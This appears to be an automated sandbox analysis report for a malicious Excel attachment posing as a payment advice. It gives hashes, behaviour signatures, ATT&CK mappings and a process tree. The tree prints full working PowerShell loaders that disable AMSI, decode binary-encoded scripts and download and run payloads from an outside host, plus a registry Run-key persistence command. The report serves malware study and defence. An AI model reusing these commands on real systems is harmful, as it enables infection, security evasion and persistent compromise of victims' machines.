Overview

overview

10

Static

static

8

Payment Ad...21.xls

windows7_x64

10

Payment Ad...21.xls

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-05-2021 20:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Payment Advice_00152021.xls

  • Size

    232KB

  • MD5

    20af1905935afccb0f520bf165eec2f8

  • SHA1

    5c3c15e2cc26401aaa0c4ca13b66423ab91002e6

  • SHA256

    8837feb2649d365d8eee6f63c53585625f56ee7439d0cf6502e686215ac21b99

  • SHA512

    b5a711b7db8effc1aa5e72a6d03188ffb88981f7e964b94007ae663afe6c969686f3c669939d5475e3ae5e2ec512bfbc37722d26108c23296e19541638e18c2b

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Advice_00152021.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non#!'.replace('#!','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);$g45gh6www=(00100100,01011010,00110001,00111101,00100111,00101000,01001110,01100101,01110111,00100111,00100000,00101011,00100000,00100111,00101101,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01011010,00110010,00111101,00100111,01100010,01000011,01101100,01101001,00100111,00100000,00101011,00100000,00100111,01100101,01101110,01110100,00101001,00101110,00100111,00101011,00100111,01000100,00100111,00101011,00100111,01101111,01110111,00100111,00101011,00100111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01011010,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01100110,01101001,01101110,01100100,00101111,01110110,01100001,01100111,01101001,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100111,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01011000,01000011,00110001,00111101,01001001,01100000,01000101,01100000,01011000,00100000,00101000,00100100,01011010,00110001,00101100,00100100,01011010,00110010,00101100,00100100,01011010,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100000,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$ggdfhsa=[system.String]::Join('', $g45gh6www);I`E`X($ggdfhsa)
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mes.js"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,01011011,01110110,01101111,01101001,01100100,01011101,00100000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01101110,01100001,01101110,00101111,01110100,01101111,01110000,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4052
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3840
          • C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"
            5⤵
            • Adds Run key to start application
            PID:2888

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    bd2b8a354a656ae03fc25d435efbc4ae

    SHA1

    4ca8ab5c88b40a06ebf484d768956ae071d09143

    SHA256

    6f178ec12606cfae1dc46ad0af2ac21b7f88a087f9a1bbf301c74315535f9214

    SHA512

    fff25739d5af57d7af51e52dab13e90b828e9658462b6acb85f617414b7e8a31f53a74653401dc3b3dafd0fcdf2b8ae2ab96465f595bec2b37f0f40b901eb401

    Download Submit
  • C:\Users\Admin\AppData\Roaming\mes.js
    MD5

    24e90355630964f5817bb14c94a61f82

    SHA1

    531dc7c73cdc6f76998518da17e2d6579b87dd42

    SHA256

    ced7255e193ce0de7c6787a4e2f3e9b0059cdc7beac525cbc179148a9574bc9c

    SHA512

    18579437cfe17a015124143390a6ff6f2f5ff3d39bcdf4fffaba95c28a79b5d2a81c551d0fe7c2b89e1295e9610538ec7cbcd0782c76539f6fa7f9840150247b

    Download Submit
  • memory/624-117-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/624-118-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/624-119-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/624-122-0x00007FFCAC480000-0x00007FFCAD56E000-memory.dmp
    Filesize

    16.9MB

    Download
  • memory/624-123-0x00007FFCAA580000-0x00007FFCAC475000-memory.dmp
    Filesize

    31.0MB

    Download
  • memory/624-116-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/624-114-0x00007FF7E8160000-0x00007FF7EB716000-memory.dmp
    Filesize

    53.7MB

    Download
  • memory/624-115-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2888-189-0x0000000000000000-mapping.dmp
    Download
  • memory/3748-183-0x0000000000000000-mapping.dmp
    Download
  • memory/3780-181-0x000002AC3F843000-0x000002AC3F845000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3780-182-0x000002AC3F846000-0x000002AC3F848000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3780-180-0x000002AC3F840000-0x000002AC3F842000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3780-179-0x0000000000000000-mapping.dmp
    Download
  • memory/3840-186-0x0000000000000000-mapping.dmp
    Download
  • memory/4052-185-0x0000000000000000-mapping.dmp
    Download
  • memory/4052-191-0x0000019FA31A3000-0x0000019FA31A5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4052-190-0x0000019FA31A0000-0x0000019FA31A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4052-192-0x0000019FA31A6000-0x0000019FA31A8000-memory.dmp
    Filesize

    8KB

    Download